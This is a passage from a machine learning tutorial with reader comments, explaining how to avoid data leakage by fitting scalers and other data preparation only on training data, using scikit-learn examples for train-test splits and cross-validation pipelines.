modeling pipeline must be prepared only on the training dataset to avoid data leakage. This might include data transforms, but also other techniques such feature selection, dimensionality reduction, feature engineering and more. This means so-called “model evaluation” should really be called “modeling pipeline evaluation”. In order for any resampling scheme to produce performance estimates that generalize to new data, it must contain all of the steps in the modeling process that could significantly affect the model’s effectiveness. — Pages 54-55, Feature Engineering and Selection, 2019. Now that we are familiar with how to apply data preparation to avoid data leakage, let’s look at some worked examples. Want to Get Started With Data Preparation? Take my free 7-day email crash course now (with sample code). Click to sign-up and also get a free PDF Ebook version of the course. Download Your FREE Mini-Course Data Preparation With Train and Test Sets In this section, we will evaluate a logistic regression model using train and test sets on a synthetic binary classification dataset where the input variables have been normalized. First, let’s define our synthetic dataset. We will use the make_classification() function to create the dataset with 1,000 rows of data and 20 numerical input features. The example below creates the dataset and summarizes the shape of the input and output variable arrays. Running the example creates the dataset and confirms that the input part of the dataset has 1,000 rows and 20 columns for the 20 input variables and that the output variable has 1,000 examples to match the 1,000 rows of input data, one value per row. Next, we can evaluate our model on the scaled dataset, starting with their naive or incorrect approach. Train-Test Evaluation With Naive Data Preparation The naive approach involves first applying the data preparation method, then splitting the data before finally evaluating the model. We can normalize the input variables using the MinMaxScaler class, which is first defined with the default configuration scaling the data to the range 0-1, then the fit_transform() function is called to fit the transform on the dataset and apply it to the dataset in a single step. The result is a normalized version of the input variables, where each column in the array is separately normalized (e.g. has its own minimum and maximum calculated). Next, we can split our dataset into train and test sets using the train_test_split() function. We will use 67 percent for the training set and 33 percent for the test set. We can then define our logistic regression algorithm via the LogisticRegression class, with default configuration, and fit it on the training dataset. The fit model can then make a prediction for the input data for the test set, and we can compare the predictions to the expected values and calculate a classification accuracy score. Tying this together, the complete example is listed below. Running the example normalizes the data, splits the data into train and test sets, 84.848 percent. Given we know that there was data leakage, we know that this estimate of model accuracy is wrong. Next, let’s explore how we might correctly prepare the data to avoid data leakage. Train-Test Evaluation With Correct Data Preparation The correct approach to performing data preparation with a train-test split evaluation is to fit the data preparation on the training set, then apply the transform to the train and test sets. This requires that we first split the data into train and test sets. We can then define the MinMaxScaler and call the fit() function on the training set, then apply the transform() function on the train and test sets to create a normalized version of each dataset. This avoids data leakage as the calculation of the minimum and maximum value for each input variable is calculated using only the training dataset (X_train) instead of the entire dataset (X). The model can then be evaluated as before. Tying this together, the complete example is listed below. Running the example splits the data into train and test sets, normalizes the data correctly, 85.455 percent, which is more accurate than the estimate with data leakage in the previous section that achieved an accuracy of 84.848 percent. We expect data leakage to result in an incorrect estimate of model performance. We would expect this to be an optimistic estimate with data leakage, e.g. better performance, although in this case, we can see that data leakage resulted in slightly worse performance. This might be because of the difficulty of the prediction task. Data Preparation With k-fold Cross-Validation In this section, we will evaluate a logistic regression model using k-fold cross-validation on a synthetic binary classification dataset where the input variables have been normalized. You may recall that k-fold cross-validation involves splitting a dataset into k non-overlapping groups of rows. The model is then trained on all but one group to form a training dataset and then evaluated on the held-out fold. This process is repeated so that each fold is given a chance to be used as the holdout test set. Finally, the average performance across all evaluations is reported. The k-fold cross-validation procedure generally gives a more reliable estimate of model performance than a train-test split, although it is more computationally expensive given the repeated fitting and evaluation of models. Let’s first look at naive data preparation with k-fold cross-validation. Cross-Validation Evaluation With Naive Data Preparation Naive data preparation with cross-validation involves applying the data transforms first, then using the cross-validation procedure. We will use the synthetic dataset prepared in the previous section and normalize the data directly. The k-fold cross-validation procedure must first be defined. We will use repeated stratified 10-fold cross-validation, which is a best practice for classification. Repeated means that the whole cross-validation procedure is repeated multiple times, three in this case. Stratified means that each group of rows will have the relative composition of examples from each class as the whole dataset. We will use k=10 or 10-fold cross-validation. This can be achieved using the RepeatedStratifiedKFold which can be configured to three repeats and 10 folds, and then using the cross_val_score() function to perform the procedure, passing in the defined model, cross-validation object, and metric to calculate, in this case, accuracy. We can then report the average accuracy across all of the repeats and folds. Tying this all together, the complete example of evaluating a model with cross-validation using data preparation with data leakage is listed below. Running the example normalizes the data first, then evaluates the model using repeated stratified cross-validation. Note: Your results may vary given the stochastic nature of the algorithm or evaluation procedure, or differences in numerical precision. Consider running the example a few times and compare the average outcome. In this case, we can see that the model achieved an estimated accuracy of about 85.300 percent, which we know is incorrect given the data leakage allowed via the data preparation procedure. Next, let’s look at how we can evaluate the model with cross-validation and avoid data leakage. Cross-Validation Evaluation With Correct Data Preparation Data preparation without data leakage when using cross-validation is slightly more challenging. It requires that the data preparation method is prepared on the training set and applied to the train and test sets within the cross-validation procedure, e.g. the groups of folds of rows. We can achieve this by defining a modeling pipeline that defines a sequence of data preparation steps to perform and ending in the model to fit and evaluate. To provide a solid methodology, we should constrain ourselves to developing the list of preprocessing techniques, estimate them only in the presence of the training data points, and then apply the techniques to future data (including the test set). — Page 55, Feature Engineering and Selection, 2019. The evaluation procedure changes from simply and incorrectly evaluating just the model to correctly evaluating the entire pipeline of data preparation and model together as a single atomic unit. This can be achieved using the Pipeline class. This class takes a list of steps that define the pipeline. Each step in the list is a tuple with two elements. The first element is the name of the step (a string) and the second is the configured object of the step, such as a transform or a model. The model is only supported as the final step, although we can have as many transforms as we like in the sequence. We can then pass the configured object to the cross_val_score() function for evaluation. Tying this together, the complete example of correctly performing data preparation without data leakage when using cross-validation is listed below. Running the example normalizes the data correctly within the cross-validation folds of the evaluation procedure to avoid data leakage. Note: Your results may vary given the stochastic nature of the algorithm or evaluation procedure, or differences in numerical precision. Consider running the example a few times and compare the average outcome. In this case, we can see that the model has an estimated accuracy of about 85.433 percent, compared to the approach with data leakage that achieved an accuracy of about 85.300 percent. As with the train-test example in the previous section, removing data leakage has resulted in a slight improvement in performance when our intuition might suggest a drop given that data leakage often results in an optimistic estimate of model performance. Nevertheless, the examples clearly demonstrate that data leakage does impact the estimate of model performance and how to correct data leakage by correctly performing data preparation after the data is split. Further Reading This section provides more resources on the topic if you are looking to go deeper. Tutorials - How to Prepare Data For Machine Learning - Applied Machine Learning Process - Data Leakage in Machine Learning Books - Feature Engineering and Selection: A Practical Approach for Predictive Models, 2019. - Applied Predictive Modeling, 2013. - Data Mining: Practical Machine Learning Tools and Techniques, 2016. - Feature Engineering for Machine Learning, 2018. APIs - sklearn.datasets.make_classification API. - sklearn.preprocessing.MinMaxScaler API. - sklearn.model_selection.train_test_split API. - sklearn.linear_model.LogisticRegression API. - sklearn.model_selection.RepeatedStratifiedKFold API. - sklearn.model_selection.cross_val_score API. Articles Summary In this tutorial, you discovered how to avoid data leakage during data preparation when evaluating machine learning models. Specifically, you learned: -. Do you have any questions? Ask your questions in the comments below and I will do my best to answer. Hello Jason and thanks for this article. I’m wondering, what if we separate the training and test sets first, then apply a simple min-max or z-score normalizer to each differently, will that help with data leakage? I’m assuming a situation where we don’t use the MinMaxScaler or any other in-built scaler from any library at all, but just a simple function we can apply to the features of both the training and testing sets separately. for example a simple min-max method like:- def min_max:(x_train): return (x_train – min(x_train)) / (max(x_train) – min(x_train)) Will separating the data sets before applying this function to each, help to reduce or prevent data leakage? If that won’t work:- How can we avoid data leakage without using the MinMax() or StandardScaler() libraries? As long as any coefficients you calculate are prepared on the training set only, or domain knowledge that is broader than both datasets. The above examples show exactly how to avoid data leakage with a train/test split. Jason, Obrigada por mia este material incrível, sou super fã do seu trabalho que em muito colabora pra minha formação e conhecimento da área. Obrigada, Deus abençoe Priscila You’re very welcome Priscila! Thanks for the article. I have two questions: When people report an accuracy that has been done “properly”, is there any particular terminology they would use to signify this? When I drop incomplete data rows, should I adjust the accuracy I quote to account for that? (Obviously, a model that doesn’t deal with incomplete data will not make good predictions on any new incomplete data.) Alternatively, is it reasonable to quote the accuracy I expect the model to achieve on complete data? Hmmm. Great question! We should try to be as complete as possible when describing how data has been prepared and how a model has been evaluated. Ideally, we would provide code to accompany a paper or report that produces the output described in the report so anyone can reproduce the result and extend it. Hi Jason, Awesome tutorial like always. What if We want to make a prediction on a single row? How would We scale it then? We cannot apply standard or minmax scaler on a single row. Thanks. You can, make it a matrix and transform it. Jason, Thanks for a clear presentation that illustrates the principles! I agree with you that the exact estimate of the model’s performance is best done in this manner, given a split between training and validation sets. However, I think it is also valuable to split into training, validation and test, in which you hold the test data out of the model until it is optimised. Thereby, the validation data can be used when optimising meta parameters for the model, and in my opinion also be used for fitting scalers. My argument for this is that in a real-life problem, you don’t just want to know the performance of the model, you also want it to be as robust as possible. Let us say that you split your data into three, for training, validation and test. I would use both the training and validation for fitting the scalar, and I use the test data to see if I get any surprises with data that fit the model poorly. Evaluation of which variables to include should also be seen in this light. Let’s say that you have elevation of measurements as an input, and this is scaled according to the range of your training data. In that case there is no guarantee that new data points is within this range, which can strongly affect non-linear classification of regression methods. You’re very welcome! Yes, you can split the validation from the training set. More here: Dear Dr Jason, In the above code for correct handling of the cross validation data Particularly the line If we were to take the naive method, then the std dev of the whole of X is the cause of the leakage. In contrast, by applying the pipeline, means that the std deviation of each subsample is taken into account? Thank you, Anthony of Sydney The pipeline fits the transform (whole pipeline) on the training part of each CV-split only. Thank you again in advance, One more question “….on the training part of each CV-split only”. That is each CV-split has its own std deviation. In contrast the ‘naive’ method does the whole dataset and not take into account the invidividual std deviation of a particular split. Hence the Pipeline ensured that the global std dev of the features X did not leak into each CV-split? Thank you Anthony of Sydney When using a pipeline the transform is not applied to the entire dataset, it is applied as needed to training data only for each repetition of the model evaluation procedure. Thank you Anthony of Sydney You’re welcome. Dear Dr Jason, I wish to compare the model performance that is naive and pipelined. From your book, listing 4.7 page 29, (46 of 398), I have successfully implemented. I will present the successful implementation of the naive code then my attempt to make a pipelined model. Succesful naive model on your code in listing 4.7, page 29 of your book. Skip this to see my attempt at pipelining. My aim is to construct a pipeline and compare the accuracy score and the cross validation scores of the model that has been pipelined. What must I put in the pipeline. This is what I would like to do. FOR THE CRUX OF THE MATTER SKIP THIS CODE, THIS IS THE QUESTION: The question is what further steps must I add to get a pipelined model.of listing 4.7 of your book. With the aim is to get: Please point me in the direction, I will work it out eventually. Thank you for your time and your ebook. Anthony of Sydney The problem is not obvious to me sorry, what is the nature of the error you’re getting? Dear Dr Jason, Thank you for your reply, These are the functions I wish to invoke within a Pipeline Here are the errors when I invoke the abovementioned functions within a Pipeline: Is there something that I am omiting or should do please? Thank you, Anthony of Sydney Sorry it is not clear to me as to what the cause is, you will have to debug the error. Dear Dr Jason, Here is further information on setting up the Pipeline Should I have added more steps in the pipeline? This is to avoid the errors described in the abovementioned errors when invoking Thank you, Anthony of Sydney The pipeline looks good to me. Perhaps confirm your data was loaded correctly. Perhaps try a diffrent dataset and see if it still causes errors. Perhaps try a diffrent model/s and see if it still causes errors. Dear Dr Jason, Thank you, your advice to change the dataset worked! I used the pima-indians-diabetes.csv file WHICH WORKED compared to the synthetic make_classification model that presented with the problem I present the programs, and the conclusions at the end. Programs: I present the code for the pipelined and naive models For the pipelined model: Summary and conclusions: For the pipelined model: accuracy 0.7755905511811023; #from the accuracy score mean(scores), std(scores); # from the cross validation scores (0.7704032809295966, 0.04222493685923635) For the naive model: accuracy ; # from the accuracy score 0.7755905511811023 mean(scores), std(scores); #from the cross_validation scores (0.7717076782866258, 0.04318082938105522) Comment: * accuracy – there appears to be no difference when using the pipelined or naive models, being 0.775591 * mean and stddev scores from cross_validation – the pipelined method produced a slightly lower mean and std dev of scores at 0.770 and 0.042 respectively compared to the naive model’s mean and std dev scores at 0.772 and 0.043 * Why my model worked with the pima-indians data but not the synthetic make_classification data. Generally it works, there is no change in values in accuracy between the pipelined and naive models. There is a slightly lower cross_validation mean and stddev scores of the pipelined model compared to the naive model. However don’t know why the synthetically generated make_classification values caused a problem. Thank you, Anthony from Sydney Well done! Dear Dr Jason, One further remark and one question: * Given that the accuracy for the naive and pipelined model is the same, we can conclude that there may well be very little leakage in the naive model. *Question please. why I used the synthetic dataset make_classification from from sklearn.datasets import make_classification produced errors whereas the pima-indians-diabetes dataset worked. Thank you Anthony of Sydney Yes, that may be the case. I don’t know off hand, perhaps check for bugs in your implementation or copy-paste. Dear Dr Jason, Thank you. For the second line, I reran the with dataset/synthetic from make_classification using the models that worked for the pima-indians-diabetes. The resuls for pipeplined and naive modes using the synthetic make_classification is: Pipeline method – using data source synthetic data make_classification accuracy 0.8424242424242424 mean(scores), std(scores) (0.8153333333333334, 0.04341530708043982) Naive method – using the data source synthetic data make_classification accuracy 0.8393939393939394 mean(scores), std(scores) 0.8153333333333334, 0.04341530708043982 Summary: Using the make_classification synthetic data, using the pipelined method greater accuracy score than the naive method while mean and stddev of scores are the same in both pipelined and naive models. Thank you for your advice, Anthony of Sydney Well done. Hi Jason, Thank you for this detailed post! I seem to be lost a little bit here and may need more clarification. Under the section “Cross-Validation Evaluation With Correct Data Preparation” and in the last code box, line 20, here is how I interpret that: – We have fed the “entire” dataset into the cross_val_score function. Therefore, the cv function splits the “entire” data into training and test sets for pre-processing and modeling. – then the pipeline is applied to both training and test sets “separately”, develops a logistic regression on the training test, and evaluates it on the test set. Now my question is, where is the cross-validation set? Given that we have fed the “entire” dataset into the cross_val_score function and the cv function splits the data into two sets, train and test, I can’t imagine how the cross-validation set is created internally and used in the process. Am I missing something here? Thank you, Mahdi Thanks. The cross_val_score function does not split into train and test sets, it performs the cross-validation process. You can learn more here: Thank you, Jason, for your prompt reply. So, in the cross_val_score in your example, we are feeding the entire dataset, X & y, to the model as well as a cv function. My understanding from this combination is that the cv splits the data iteratively and then in each iteration the pipeline is applied. This means two sub-datasets are created in each iteration. What are these two sub-sets? Test, train, or cross-validation? Thanks again! Mahdi The dataset is split into k non-overlapping folds, one fold is held back to evaluate the model (test) and the rest are used to train the model and a score is recored, this is then repeated so that each fold gets a chance to be used as the hold out set, meaning we evaluate k models and get k scores. This is the k-fold cross-validation process, not a train-test process – which is something different. Learn more how k-fold cross-validation works here: Thanks, Jason! I have seen that in some instances a test set is held out (using train_test_split) and the train set is then fed into the pipeline and cross_val_score. How different is that from what you did (as you used the whole dataset in cross_vale_score)? When do we use your approach and when the other one? Thank you again for your responses! Mahdi Perhaps the hold out set is used as a final validation of the selected model. A good approach if you can spare the data. In that case how to avoid data leakage in the CV since we do : 1. split train/test 2. fit_transform on train + transform on test 3. use the already transformed train set to feed the CV => data leakage If you do that, then yes there would be leakage. You would use a pipeline within the cv that will correctly fit/apply transforms. Hello Jason, I agree that some preprocessing methods may lead to data leakage. But I do not get why the normalization step could cause such a problem. If you want to avoid covariate shift, train set and test set should have similar distribution. If so, statistical properties like min, max or std should be similar for both sets and normalization on training set or full dataset should not be so significant. Could you please explain what I am missing ? Thank you very much ! Melec If any data prep coefficients (e.g. min/max/mean/stdev/…) use out of sample data (e.g. test set), that is data leakage. Thank you for sharing a great Article! In case we have multiple rows for some subjects (e.g., more than one example for some subjects), do you have nay recommendation in your book for prevention of data leakage? Would be great to see an example on how to split data 1) while keeping the prevalence in train and test sets, and 2) prevent the same subject to be in training and test sets. Wonderful point! Yes, data for the same subject probably should (must!?) be kept together in the same dataset to avoid data leakage. how can i implement several pre-precessing steps using pipeline after performing train_test_split ,similar to the approach as shown for cv by you? You can use a pipeline. I define a pipeline which has imputer,stdscaler etc as follows pl=Pipeline(….) Then fit it pl.fit(X_train,y_train) As i’ve performed train_test_split before any pre-processing so my X_test contains missing values. Using pl.score(X_test,y_test) does not apply the pipeline pre-processing to the X_test dataset as it shows error for NaN. What can i use to apply the same pre-processing to the X_test? Even pl.predict gives error. dt=DecisionTreeClassifier() pl=Pipeline(steps=[(‘transform’,col_transform),(‘dt’,dt)]) this is the pipeline If the pipeline has an imputer, and the test set is just like the train set, then pipeline will handle the missing values. Perhaps use fit() then predict() and evaluate the results manually. Thanks a lot Jason. Tc You’re welcome. Hi, I am currently working through this problem, and I have a conceptual question about leakage and the scaling operation. 1. Split the data. 2. Fit the scaler to the training data (but not the test data). 3. Transform both sets of data using the same scaler. Why is this ok? We are using data from the train set (step 2), to transform the test data? Yes, we are using known historical data used to fit a model (train) to prepare new and previously unseen data not used to train the model (test). Hi Jason. Thanks for this post. During model selection ,for the given X_test, X_validation and X_test , can’t we fit and transform each of them separately ? Asking this question because, when I am testing the saved model on new test data , I need to fit transform the new data set . Not sure I follow your question, perhaps you can rephrase it? The data prep is fit on the training set, then applied to the training, test, validation sets before the data is provided to the model. During training , we standardise the train data (scaler.fit_transform()). Then based on the train data , we standardise the validation and test data (scaler.transform()) . My question is after model selection , when we have new batch of test data , we need to standardise it. At that time , I just standardise the new test data i.e scaler.fit_transform() and predict using the saved model . Is this method right to treat new test data ?? Especially when we are running the model in a web application and have no access to historical data. Thanks ! Yes, scale new data using a data prep object fit on training data. Sorry Jason. Didn’t quite understand. In the context of a web application , we just have the saved model , right ? How do I get the data prep object that is fit on training data ? Am I missing something ? So , then would it be right to just scale the test data and use it for prediction ? You can save the entire pipeline (data prep and model) or save the data prep objects and model separately. Your choice. oh ok . Got it . Thanks Jason. Hi Jason Great explanations always. Can you please indicate whether your advice also applies to categorical data? That is, can we encoder categorical data before the train test split? Thanks. Yes. Encoding should be on training data only. You might want to use “domain knowledge” in the encoding though (e.g. all possible values you may see in practice), and that could be fine. Hi Jason, Great article, I have a question about the FE process. I do understand that in order to perform transformations such as min/max scaler or normalization we should first fit_transform on the training data and then transform on test data. Before we apply the modelling we always look at the features: try to find the correlations, fill the missing values in the data and design new features: 1) Whenever I want to deal with missing values how can I deal with the issue of imputing the values? To my understanding, I cant simply look at the combined training and testing set and then impute the missing values as that would leak data knowledge about the testing set. What’s the solution to that problem? 2) Assuming I deal with continuous numerical features ex. age. If I want to perform binning on that feature then I would do it separately on training and testing data. But that would create a big problem which is that the binning would be different in training and testing data due to different data and thus the features will be different. This will not allow me to later fit the data to the model. How do I deal with this issue? Binning numerical features based on the whole dataset would solve that issue but might introduce data leakage. 3) Do log() transforms also need to be applied separately on training and testing data? It is just a mathematical operation that doesn’t seem to be using any specific parameters of the data (correct me if I am wrong) Your feedback would be of great value, Thanks You fit imputation methods on the training data and apply to the test data just like any other data preparation method. Binning would be fit on the training data and applied to train and test data in the same way. Log can be applied any time to any data, it has no learned coefficient.
https://machinelearningmastery.com/data-preparation-without-data-leakage/
CC-MAIN-2021-31
refinedweb
5,853
54.22
Java program to print random uppercase letter in a String : In this tutorial, we will learn how to print random uppercase letter from a String in Java. To achieve that, we will first create one random number . The size of the random number is maximum length of the string. After that, we will pick the character for that position from the String and finally, we will print the uppercase version of the character. The java program is as below : Java program to print random Uppercase character : import java.util.*; public class Main { public static void main(String[] args) { //1 String myString = "HelloWorld"; //2 Random randomNumber = new Random(); //3 for (int i = 0; i < 10; i++) { //4 int randomNo = randomNumber.nextInt(myString.length()); //5 Character character = myString.charAt(randomNo); //6 System.out.println("Random Character : " + Character.toUpperCase(character)); } } } Explanation : _ The commented numbers in the above program denotes the step number below : _ - String is given and stored in the variable myString. - Create one Random object to create random number. - Run one for loop to run for 10 times. We will print one random character each time. - Create one random number using the Random object created on step - 2. The object will create maximum number 7 for this example since size of string myString is 8. - Get the character from the string for that random position we have calculated in the above step. - Print out the uppercase character by converting the character to upper case Output : Random Character : E Random Character : R Random Character : R Random Character : O Random Character : E Random Character : D Random Character : L Random Character : O Random Character : D Random Character : D The output will different for your case, because it will pick random character for each of these 10 steps.
https://www.codevscolor.com/java-print-random-uppercase-letter-string
CC-MAIN-2020-40
refinedweb
294
54.63
On Sat, Feb 04, 2012 at 10:17:48PM +0000, Russell King - ARM Linux wrote:> On Fri, Jan 27, 2012 at 02:35:54PM -0700, Grant Likely wrote:> > Hey everyone,> > > > This patch series is ready for much wider consumption now. I'd like> > to get it into linux-next ASAP because there will be ARM board support> > depending on it. I'll wait a few days before I ask Stephen to pull> > this in.> > Grant,> > Can you answer me this: does this irqdomain support require DT?> > The question comes up because OMAP has converted some of their support> to require irq domain support for their PMICs, and it seems irq domain> support requires DT. This seems to have made the whole of OMAP> essentially become a DT-only platform.> > Removing the dependency on IRQ_DOMAIN brings up these build errors> in the twl-core code (that being the PMIC for OMAP CPUs):> > drivers/mfd/twl-core.c: In function 'twl_probe':> drivers/mfd/twl-core.c:1229: error: invalid use of undefined type 'struct irq_domain'> drivers/mfd/twl-core.c:1230: error: invalid use of undefined type 'struct irq_domain'> drivers/mfd/twl-core.c:1235: error: implicit declaration of function 'irq_domain_add'> > That's a bit of a problem, because afaik there aren't the DT descriptions> for the boards I have yet, so it's causing me to see regressions when> building and booting kernels with CONFIG_OF=n.> > The more core-code we end up with which requires DT, the worse this> problem is going to become - and obviously saying "everyone must now> convert to DT" is, even today, a mammoth task.> > Now, here's the thing: I believe that IRQ domains - at least as far as> the hwirq stuff - should be available irrespective of whether we have> the rest of the IRQ domain support code in place, so that IRQ support> code doesn't have to keep playing games to decode from the global> space to the per-controller number space.> > I believe that would certainly help the current OMAP problems, where> the current lack of CONFIG_IRQ_DOMAIN basically makes the kernel oops> on boot.> > How we fix this regression for 3.4 I've no idea at present, I'm trying> to work out what the real dependencies are for OMAP on this stuff.Actually, it turns out to be not that hard, because twl doesn't actuallymake use of the IRQ domain stuff:commit aeb5032b3f8b9ab69daa545777433fa94b3494c4Author: Benoit Cousson <b-cousson@ti.com>AuthorDate: Mon Aug 29 16:20:23 2011 +0200Commit: Samuel Ortiz <sameo@linux.intel.com>CommitDate: Mon Jan 9 00:37:40 2012 +0100 mfd: twl-core: Add initial DT support for twl4030/twl6030 [grant.likely@secretlab.ca: Fix IRQ_DOMAIN dependency in kconfig]Adding any dependency - especially one which wouldn't be enabled - fora new feature which wasn't required before is going to break existingusers, so this shouldn't have been done in the first place.A better fix to preserve existing users would've been as below - yesit means more ifdefs, but if irq domain is to remain a DT only thingthen we're going to end up with _lots_ of this stuff.I'd much prefer to see irq domain become more widely available so itdoesn't require these ifdefs everywhere. drivers/mfd/Kconfig | 2 +- drivers/mfd/twl-core.c | 4 ++++ 2 files changed, 5 insertions(+), 1 deletions(-)diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfigindex 28a301b..bd60ce0 100644--- a/drivers/mfd/Kconfig+++ b/drivers/mfd/Kconfig@@ -200,7 +200,7 @@ config MENELAUS config TWL4030_CORE bool "Texas Instruments TWL4030/TWL5030/TWL6030/TPS659x0 Support"- depends on I2C=y && GENERIC_HARDIRQS && IRQ_DOMAIN+ depends on I2C=y && GENERIC_HARDIRQS help Say yes here if you have TWL4030 / TWL6030 family chip on your board. This core driver provides register access and IRQ handlingdiff --git a/drivers/mfd/twl-core.c b/drivers/mfd/twl-core.cindex e04e04d..5913aaa 100644--- a/drivers/mfd/twl-core.c+++ b/drivers/mfd/twl-core.c@@ -263,7 +263,9 @@ struct twl_client { static struct twl_client twl_modules[TWL_NUM_SLAVES]; +#ifdef CONFIG_IRQ_DOMAIN static struct irq_domain domain;+#endif /* mapping the module id to slave id and base address */ struct twl_mapping {@@ -1226,6 +1228,7 @@ twl_probe(struct i2c_client *client, const struct i2c_device_id *id) pdata->irq_base = status; pdata->irq_end = pdata->irq_base + nr_irqs; +#ifdef CONFIG_IRQ_DOMAIN domain.irq_base = pdata->irq_base; domain.nr_irq = nr_irqs; #ifdef CONFIG_OF_IRQ@@ -1233,6 +1236,7 @@ twl_probe(struct i2c_client *client, const struct i2c_device_id *id) domain.ops = &irq_domain_simple_ops; #endif irq_domain_add(&domain);+#endif if (i2c_check_functionality(client->adapter, I2C_FUNC_I2C) == 0) { dev_dbg(&client->dev, "can't talk I2C?\n");
http://lkml.org/lkml/2012/2/4/105
CC-MAIN-2017-22
refinedweb
755
59.84
On Mon, Feb 6, 2017 at 5:49 PM, Corey Huinker <corey.huin...@gmail.com> wrote: > I suppressed the endif-balance checking in cases where we're in an > already-failed situation. > In cases where there was a boolean parsing failure, and ON_ERROR_STOP is on, > the error message no longer speak of a future which the session does not > have. I could left the ParseVariableBool() message as the only one, but > wasn't sure that that was enough of an error message on its own. > Added the test case to the existing tap tests. Incidentally, the tap tests > aren't presently fooled into thinking they're interactive. > > $ cat test2.sql > \if error > \echo NO > \endif > \echo NOPE > $ psql test < test2.sql -v ON_ERROR_STOP=0 > unrecognized value "error" for "\if <expr>": boolean expected > new \if is invalid, ignoring commands until next \endif > NOPE > $ psql test < test2.sql -v ON_ERROR_STOP=1 > unrecognized value "error" for "\if <expr>": boolean expected > new \if is invalid. I (still) think this is a bad design. Even if you've got all the messages just right as things stand today, some new feature that comes along in the future can change things so that they're not right any more, and nobody's going to relish maintaining this. This sort of thing seems fine to me: new \if is invalid But then further breaking it down by things like whether ON_ERROR_STOP=1 is set, or breaking down the \endif output depending on the surrounding context, seems terrifyingly complex to me. Mind you, I'm not planning to commit this patch anyway, so feel free to ignore me, but if I were planning to commit it, I would not commit it with that level of chattiness. -- Robert Haas EnterpriseDB: The Enterprise PostgreSQL Company -- Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org) To make changes to your subscription:
https://www.mail-archive.com/pgsql-hackers@postgresql.org/msg304711.html
CC-MAIN-2018-43
refinedweb
311
69.01
We have a wide variety of options to store data in Microsoft Azure. Nevertheless, every storage option has a unique purpose for its existence. In this blog, we will discuss ADLS (Azure Data Lake Storage) and its multi-protocol access that Microsoft introduced in the year 2019. Introduction to ADLS (Azure Data Lake Storage) According to the Microsoft definition, it is an enterprise-wide hyper-scale repository for big data analytics workloads and enables you to capture data of any size and ingestion speed in one single space for operational and exploratory analytics. The main purpose of its existence is to enable analytics on the stored data (it may be of any type structured, semi-structured and unstructured data) and provide enterprise-grade capabilities like scalability, manageability, reliability, etc. Where does it build? ADLS is built on the top of the Azure Blob Storage. Blob Storage is one of the storage services under the suite of Storage accounts. Blob storage lets you store any type of data and it doesn’t necessarily to be a specific data type. Does the functionality of ADLS sound like the Blob storage? From the above paragraphs, it looks like both ADLS and Blob storage has the same functionality. Because, both the services can be used to store any type of data. But, as I said before, every service has its purpose for its existence. Let us explore, what is the difference between ADLS and Blob storage in the following. Difference between ADLS and Blob storage Purpose It is optimized for analytical purposes on the data stored in the ADLS, but Blob storage is a usual way of storing file-based information in Azure where the data which will not be accessed very often also called as cold storage. Cost In both the storage options, we need to pay the amount for the data stored and I/O operations. In the case of ADLS, the cost is slightly higher than the Blob. Support for Web HDFS interface ADLS supports a standard web HDFS interface and can access the files and directories in Hadoop. Blob does not support this feature. I/O performance ADLS is built for running large scale systems that require massive read throughput when queried against the DB at any pace. Blob is used for store data which will be accessed infrequently. Encryption at rest Since ADLS GA, it supports encryption at rest. It encrypts data flowing in public networks and at rest. Blob Storage does not support encryption at rest. See more details on the comparison here. Now, without any further delay let us dig on the Multi-protocol access for ADLS. Multi-protocol access for ADLS This is one of the significant announcements that Microsoft has done in the year 2019 as far as ADLS is concern. Multi-protocol access to the same data allows you to leverage existing object storage capabilities on Data Lake Storage accounts, which are hierarchical namespace-enabled storage accounts built on top of Blob storage. This allows you to put all your different types of data in the data lake so that the users can make the best use of your data as the use case evolves. The multi-protocol concept can be achieved via Azure Blob storage API and Azure Data Lake Storage API. The convergence of both the existing services, ADLS Gen1 and blob storage, paved the path to a new term called Azure Data Lake Storage Gen 2. Expanded feature set With the announcement of multi-protocol access, existing blob features such as access tiers and lifecycle management policies are now unlocked for ADLS. Furthermore, it enables many of the features and ecosystem support of blob storage is now supported for your data lake storage. This could be a great shift because your blob data can now be used for analytics. The best thing is you don’t need to update the existing applications to get access to your data stored in Data Lake Storage. Moreover, you can leverage the power of both your analytics and object storage applications to use your data most effectively. While exploring the expanded feature sets, one of the best things I could found is that ADLS can now be integrated with Azure Event Grid. Yes, we have one more publisher on the list for Azure Event Grid. Azure Event Grid can now be used to consume events generated from Azure Data Lake Storage Gen2 and routed to its subscribers with webhooks, Azure Event Hubs, Azure Functions, and Logic Apps as endpoints. Modern Data Warehouse scenario The above image depicts the use case scenario of ADLS integration with Event Grid. First off, there are a lot of data comes from different sources like Logs, Media, Files and Business apps. Those data are ending up in the ADLS via Azure Data Factory and the Event Grid which listens to the ADLS gets triggered once data reaches it. Further, the event gets routed via Event Grid and Functions to Azure Databricks. The file will be processed by the databricks job and writes the output back to Azure Data Lake Storage Gen2. Meanwhile, Azure Data Lake Storage Gen2 pushes a notification to Event Grid which triggers an Azure Function to copy data to Azure SQL Data Warehouse. Finally, the data will be served via Azure Analysis Services and PowerBI. Wrap-up In this blog, we have seen an introduction about the Azure Data Lake Storage and the difference between ADLS and blob storage. Further, we investigated the multi-protocol access which is one of the new entrants in ADLS. Finally, we looked into one of the extended feature sets – integration of ADLS with Azure Event Grid and its use case scenario. I hope you enjoyed reading this article. Happy Learning! Image Credits: Microsoft This article was contributed to my site by Nadeem Ahamed and you can read more of his articles from here. You must log in to post a comment.
https://sajeetharan.com/2020/01/15/investigating-into-azure-data-lake-storage-and-its-multi-protocol-access/
CC-MAIN-2021-04
refinedweb
990
60.95
